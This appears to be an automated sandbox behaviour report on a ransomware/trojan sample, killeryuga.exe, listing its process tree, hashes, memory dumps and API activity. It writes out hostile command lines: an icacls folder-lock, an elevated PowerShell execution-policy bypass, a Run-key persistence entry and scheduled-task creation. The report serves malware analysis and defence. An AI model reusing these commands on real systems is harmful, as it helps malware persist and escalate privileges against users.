ac69e0f6...26b4 | Grouped Behavior
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Spyware, Ransomware, Trojan, Dropper, Backdoor

Monitored Processes

Process Overview
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x8e0 Analysis Target High (Elevated) killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" -
#3 0x98c Child Process High (Elevated) icacls.exe icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a" /deny *S-1-1-0:(OI)(CI)(DE,DC) #1
#4 0x50c Created Scheduled Job High (Elevated) taskeng.exe taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1] #1
#5 0x99c Child Process High (Elevated) killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --Admin IsNotAutoStart IsNotTask #1
#6 0x9d0 Child Process High (Elevated) killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --ForNetRes "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt IsNotAutoStart IsNotTask #5
#7 0x9d8 Child Process High (Elevated) killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --Service 2460 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt #5
#8 0x9ec Child Process High (Elevated) updatewin1.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe" #5
#9 0x9fc Child Process High (Elevated) updatewin2.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe" #5
#10 0xa0c Child Process High (Elevated) updatewin1.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe" --Admin #8
#11 0xa18 Child Process High (Elevated) updatewin.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe" #5
#12 0xa38 Child Process High (Elevated) 5.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe" #5
#13 0xa4c Child Process High (Elevated) powershell.exe powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned #10
#14 0xb04 Child Process High (Elevated) powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1""' -Verb RunAs}" #10
#16 0x780 Autostart Medium killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart -
#18 0x588 Child Process Medium killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --ForNetRes "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt IsAutoStart IsNotTask #16
#19 0x5a4 Child Process Medium killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --Service 1920 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt #16
#20 0x7a0 Child Process Medium killeryuga.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --Service 1416 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt #18

Behavior Information - Grouped by Category

Process #1: killeryuga.exe
Information Value
ID #1
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:22, Reason: Analysis Target
Unmonitor End Time: 00:00:54, Reason: Self Terminated
Monitor Duration 00:00:32
OS Process Information
Information Value
PID 0x8e0
Parent PID 0x45c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x8E4, 0x8F0, 0x8F4, 0x8F8, 0x8FC, 0x900, 0x904, 0x910, 0x984, 0x988, 0x998
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Marked Writable - 32-bit - False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00407C6C, 0x004035D8 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
buffer 0x00293F80 0x002D2EB3 Marked Executable - 32-bit - False
buffer 0x00293F80 0x002D2EB3 Content Changed - 32-bit 0x002948AB, 0x00293F80 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00421FDE, 0x0040D690, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043EE43 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043F020 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004425A0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043BFE0 False
killeryuga.exe 0x00400000 0x007CCFFF Process Termination - 32-bit - False
Dropped Files
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe 345.50 KB MD5: 55b42589931331c2929847c78d0933d5, SHA1: 904940b9ab5442595f75f6d6dfe46832569bc234, SHA256: ac69e0f6c8a697982a4897607ccd4def633354f6336a68985d48ae78920e26b4, SSDeep: 6144:CcygBt56u4UqjIC6ibJd9mke7R68W55C0aPCUN8VOuMua6oIHCKvFXT:3ygP5bq0C3JKJR68m5C76suMKoIH9XT False
Modified Files
Filename File Size Hash Values YARA Match Actions
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat 64.00 KB MD5: 2db89fb48fd886b621627751f2ae15ed, SHA1: e2f78c6a535f4ba230a4470402b6f905f0b4c066, SHA256: dfc9aeb2ad6900a7b836db92a36a9d2162c84551134c0291757cc352206a3166, SSDeep: 384:gnjyLKYBfFVZJptKF2KTFZTCzXTtX+Yih9aX5Jqiq+AN:6OLKYBdVZJptKF2KTFZTCzp++8 False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\cookies\index.dat 32.00 KB MD5: 74d69403f4a938faa28298c110bc71c3, SHA1: c016f27979d48a90bb341ccf7ffef41a3955f4d5, SHA256: 8b9d3a6a22778e368c9e81397e2b1af64b9739f7ade535966708f34bcf6eada9, SSDeep: 48:qMhaLouhzppiksLSLWFM+AWi3QTGnbYbQWy58V4l9:qO7appiksLSLaH0QCnMbQ5ll9 False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\history\history.ie5\index.dat 64.00 KB MD5: 5e31bed3dcccef21e35fb4760123ec80, SHA1: 9b71b827ebf51079bc9fc5a16f8e55632420973f, SHA256: 2b20e239286f1c2d4e92d6657cc4476dc410b74553fb57b53f11b5fbd7101466, SSDeep: 192:JBdGeOS2B5KSijSgSaSQSzSASxSXSUS8SRSnSfSfSVSZSKSjwSWASMSYSVSvSvSJ:rdGj5it8TTZ4R5/4 False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\ietldcache\index.dat 256.00 KB MD5: 6852149628dae385c68c7a9db7028560, SHA1: c6e02c929ec99f984b04876816024c3a39b88ccb, SHA256: 53ae38a5bdbd72f76bf578f6c36e0b54a994003f535dbc1b469c12f3a169e3a4, SSDeep: 384:p8JEJH45Y0z6hKO59HqXRIhHPQ3NGjt3hAJnNH0kHf9QV9wRULzArvCCjgnF5TRy:pTHcEt8jdjFQg2cEbcaaoQARz40LG False
Host Behavior
COM (8)
Operation Class Interface Additional Information Success Count Logfile
Create TaskScheduler ITaskService cls_context = CLSCTX_INPROC_SERVER True 1
Execute TaskScheduler ITaskService method_name = Connect, server_name = 95, domain = 95, password = 4280555 True 1
Execute TaskScheduler ITaskService method_name = GetFolder, path = \, new_interface = ITaskFolder True 1
Execute TaskScheduler ITaskService method_name = NewTask, new_interface = ITaskDefinition True 1
Execute TaskScheduler ITaskDefinition method_name = get_Triggers, new_interface = ITriggerCollection True 1
Execute TaskScheduler ITriggerCollection method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger True 1
Execute TaskScheduler IDailyTrigger method_name = put_StartBoundary, start_boundary = 2019-03-25T03:38:09 True 1
Execute TaskScheduler ITaskDefinition method_name = get_Actions, new_interface = IActionCollection True 1
File (9)
Operation Filename Additional Information Success Count Logfile
Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a - True 1
Open STD_INPUT_HANDLE - True 2
Open STD_OUTPUT_HANDLE - True 2
Open STD_ERROR_HANDLE - True 2
Copy C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe True 1
Delete C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe - False 1
Registry (4)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = 0, type = REG_NONE False 1
Write Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, size = 218, type = REG_EXPAND_SZ True 1
Process (46)
Operation Process Additional Information Success Count Logfile
Create icacls os_pid = 0x98c, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe show_window = SW_SHOW True 1
Enumerate Processes - - True 1
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\services.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\program files (x86)\windows photo viewer\departure-wm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\microsoft synchronization services\controllers.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\windows portable devices\evaluating_explosion_former.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\java\magnificent.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\windows media player\pregnancy-infection-derby.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\windows photo viewer\kai.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\microsoft office\dvd_boom_scale.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\mozilla firefox\adaptation_sleeping_presentations.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\adobe\accommodation-throat-deviation.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\windows photo viewer\joseph.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\windows mail\byte-emergency-resulted.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\microsoft sql server compact edition\noble-technologies.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\microsoft sql server compact edition\cardiovascularhear.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\msbuild\assets_portion.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\internet explorer\landgovernmental.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\internet explorer\packed bags.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files\reference assemblies\tale-plaintiff-basename.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\system32\wbem\wmiprvse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Module (470)
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x76c20000 True 1
Load ADVAPI32.dll base_address = 0x74d40000 True 2
Load GDI32.dll base_address = 0x75ad0000 True 1
Load ole32.dll base_address = 0x755e0000 True 2
Load SHELL32.dll base_address = 0x75fd0000 True 2
Load USER32.dll base_address = 0x74f40000 True 2
Load kernel32.dll base_address = 0x76c20000 True 2
Load RPCRT4.dll base_address = 0x75ee0000 True 1
Load MPR.dll base_address = 0x74b50000 True 1
Load WININET.dll base_address = 0x753d0000 True 1
Load WINMM.dll base_address = 0x74b10000 True 1
Load SHLWAPI.dll base_address = 0x75340000 True 1
Load KERNEL32.dll base_address = 0x76c20000 True 1
Load OLEAUT32.dll base_address = 0x75220000 True 1
Load IPHLPAPI.DLL base_address = 0x74af0000 True 1
Load WS2_32.dll base_address = 0x75bc0000 True 1
Load DNSAPI.dll base_address = 0x74a90000 True 1
Load CRYPT32.dll base_address = 0x759b0000 True 1
Load msvcr100.dll base_address = 0x749d0000 True 1
Load Psapi.dll base_address = 0x75140000 True 1
Load Shell32.dll base_address = 0x75fd0000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 16
Get Handle mscoree.dll - False 1
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 2
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 1024 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringA, address_out = 0x76c33c5a True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 2
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 2
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x76c33c42 True 2
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x76c33bca True 2
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesA, address_out = 0x76c5287b True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x76c33da5 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatA, address_out = 0x76c5a959 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatA, address_out = 0x76c5a842 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeA, address_out = 0x76c58266 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteFileEx, address_out = 0x76cb45ef True 1
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x76cb4691 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FillConsoleOutputAttribute, address_out = 0x76cd71e9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76c31245 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetCommMask, address_out = 0x76cb7198 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TransmitCommChar, address_out = 0x76cb75fe True 1
Get Address c:\windows\syswow64\kernel32.dll function = PrepareTape, address_out = 0x76cbd232 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 2
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumePathNameA, address_out = 0x76cbbeed True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsBadWritePtr, address_out = 0x76c5d1ec True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindNextVolumeMountPointA, address_out = 0x76cbc189 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 3
Get Address c:\windows\syswow64\kernel32.dll function = UnlockFileEx, address_out = 0x76c5d594 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryExA, address_out = 0x76ca9479 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteTapemark, address_out = 0x76cbd2d2 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x76c3418b True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x76c410b5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x76c4ce46 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GlobalDeleteAtom, address_out = 0x76c4cdad True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringA, address_out = 0x76c5bc39 True 1
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 2
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleA, address_out = 0x76c312fc True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 2
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 2
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedExchange, address_out = 0x76c31462 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 2
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 2
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 3
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 2
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 2
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 3
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x76c3cb29 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 2
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x76c31400 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x76c317ec True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x76c34a2d True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapDestroy, address_out = 0x76c335b7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 3
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 2
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 2
